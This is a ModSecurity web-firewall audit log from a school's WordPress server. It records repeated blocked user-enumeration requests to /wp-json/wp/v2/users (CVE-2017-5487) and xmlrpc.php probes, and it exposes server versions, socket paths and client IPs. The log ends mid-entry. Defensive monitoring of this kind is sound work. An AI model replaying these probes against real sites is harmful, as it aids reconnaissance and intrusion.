[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814888589940 5578 (- - -) Stopwatch2: 1746814888589940 5578; combined=4204, p1=544, p2=3418, p3=34, p4=33, p5=102, sr=90, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51c8590a-Z-- --a963a941-A-- [10/May/2025:01:50:43 +0700] aB5Ogx6q_ZMebht3q14lRAAAAIw 103.236.140.4 59180 103.236.140.4 8181 --a963a941-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.77.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.77.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a963a941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a963a941-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816643047495 2933 (- - -) Stopwatch2: 1746816643047495 2933; combined=1301, p1=448, p2=822, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a963a941-Z-- --f1604d43-A-- [10/May/2025:01:54:44 +0700] aB5PdB6q_ZMebht3q14lSwAAAII 103.236.140.4 59202 103.236.140.4 8181 --f1604d43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.73.133.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.73.133.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f1604d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1604d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816884675749 3353 (- - -) Stopwatch2: 1746816884675749 3353; combined=1484, p1=491, p2=953, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1604d43-Z-- --af84b342-A-- [10/May/2025:01:56:16 +0700] aB5P0C-fAO47ojYKsMr6eAAAAFg 103.236.140.4 59208 103.236.140.4 8181 --af84b342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --af84b342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af84b342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816976450190 2846 (- - -) Stopwatch2: 1746816976450190 2846; combined=1276, p1=432, p2=816, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af84b342-Z-- --d78c2f3b-A-- [10/May/2025:01:56:22 +0700] aB5P1h6q_ZMebht3q14lTQAAAJc 103.236.140.4 59212 103.236.140.4 8181 --d78c2f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d78c2f3b-C-- demo.sayHello --d78c2f3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78c2f3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746816982318877 6463 (- - -) Stopwatch2: 1746816982318877 6463; combined=4691, p1=607, p2=3846, p3=37, p4=42, p5=95, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78c2f3b-Z-- --6e4c0b71-A-- [10/May/2025:01:57:04 +0700] aB5QAB6q_ZMebht3q14lUAAAAIU 103.236.140.4 59220 103.236.140.4 8181 --6e4c0b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e4c0b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e4c0b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817024455990 2889 (- - -) Stopwatch2: 1746817024455990 2889; combined=1307, p1=465, p2=812, p3=0, p4=0, p5=30, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e4c0b71-Z-- --1e15b10b-A-- [10/May/2025:01:57:11 +0700] aB5QBy-fAO47ojYKsMr6eQAAAEA 103.236.140.4 59224 103.236.140.4 8181 --1e15b10b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e15b10b-C-- demo.sayHello --1e15b10b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e15b10b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817031436802 4456 (- - -) Stopwatch2: 1746817031436802 4456; combined=3136, p1=469, p2=2504, p3=25, p4=29, p5=65, sr=58, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e15b10b-Z-- --e505e142-A-- [10/May/2025:01:57:16 +0700] aB5QDB6q_ZMebht3q14lVAAAAIE 103.236.140.4 59232 103.236.140.4 8181 --e505e142-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e505e142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e505e142-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817036210640 2056 (- - -) Stopwatch2: 1746817036210640 2056; combined=986, p1=337, p2=621, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e505e142-Z-- --440bf318-A-- [10/May/2025:01:57:24 +0700] aB5QFFoC-7ITMWTA_c9fpgAAAMs 103.236.140.4 59236 103.236.140.4 8181 --440bf318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --440bf318-C-- demo.sayHello --440bf318-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --440bf318-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817044916598 4954 (- - -) Stopwatch2: 1746817044916598 4954; combined=3902, p1=479, p2=3128, p3=30, p4=29, p5=132, sr=68, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440bf318-Z-- --df195d31-A-- [10/May/2025:01:58:19 +0700] aB5QS1oC-7ITMWTA_c9fqAAAANE 103.236.140.4 59306 103.236.140.4 8181 --df195d31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --df195d31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df195d31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817099694346 2134 (- - -) Stopwatch2: 1746817099694346 2134; combined=1074, p1=368, p2=672, p3=0, p4=0, p5=34, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df195d31-Z-- --995f6c74-A-- [10/May/2025:01:58:27 +0700] aB5QU1oC-7ITMWTA_c9fqgAAANc 103.236.140.4 59390 103.236.140.4 8181 --995f6c74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --995f6c74-C-- demo.sayHello --995f6c74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --995f6c74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817107266113 5524 (- - -) Stopwatch2: 1746817107266113 5524; combined=4535, p1=569, p2=3519, p3=34, p4=35, p5=204, sr=77, sw=174, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --995f6c74-Z-- --0b8a392d-A-- [10/May/2025:01:59:10 +0700] aB5QflqQ1nOVx9fWpZSx8gAAAAw 103.236.140.4 59668 103.236.140.4 8181 --0b8a392d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b8a392d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b8a392d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817150845494 2967 (- - -) Stopwatch2: 1746817150845494 2967; combined=1358, p1=458, p2=870, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b8a392d-Z-- --6674307c-A-- [10/May/2025:01:59:19 +0700] aB5Qh1qQ1nOVx9fWpZSx9AAAABQ 103.236.140.4 59672 103.236.140.4 8181 --6674307c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6674307c-C-- demo.sayHello --6674307c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6674307c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817159018082 6493 (- - -) Stopwatch2: 1746817159018082 6493; combined=4787, p1=588, p2=3894, p3=39, p4=43, p5=128, sr=74, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6674307c-Z-- --bac3e118-A-- [10/May/2025:02:00:22 +0700] aB5QxVqQ1nOVx9fWpZSx-AAAABc 103.236.140.4 59686 103.236.140.4 8181 --bac3e118-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bac3e118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac3e118-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817221996857 3226 (- - -) Stopwatch2: 1746817221996857 3226; combined=1358, p1=487, p2=834, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac3e118-Z-- --22ae172c-A-- [10/May/2025:02:00:28 +0700] aB5QzFoC-7ITMWTA_c9gFAAAAMw 103.236.140.4 59690 103.236.140.4 8181 --22ae172c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22ae172c-C-- demo.sayHello --22ae172c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ae172c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817228180607 7506 (- - -) Stopwatch2: 1746817228180607 7506; combined=5834, p1=731, p2=4816, p3=50, p4=67, p5=102, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ae172c-Z-- --3073bf14-A-- [10/May/2025:02:03:01 +0700] aB5RZS-fAO47ojYKsMr64gAAAEk 103.236.140.4 59708 103.236.140.4 8181 --3073bf14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3073bf14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3073bf14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817381520460 2486 (- - -) Stopwatch2: 1746817381520460 2486; combined=947, p1=326, p2=589, p3=0, p4=0, p5=32, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3073bf14-Z-- --4ce57e34-A-- [10/May/2025:02:03:06 +0700] aB5Rai-fAO47ojYKsMr65AAAAE8 103.236.140.4 59712 103.236.140.4 8181 --4ce57e34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ce57e34-C-- demo.sayHello --4ce57e34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ce57e34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817386394176 6150 (- - -) Stopwatch2: 1746817386394176 6150; combined=4423, p1=579, p2=3665, p3=34, p4=34, p5=67, sr=81, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ce57e34-Z-- --e67c854d-A-- [10/May/2025:02:57:10 +0700] aB5eFi-fAO47ojYKsMr7BAAAAFc 103.236.140.4 59980 103.236.140.4 8181 --e67c854d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.72.196.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.72.196.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e67c854d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e67c854d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 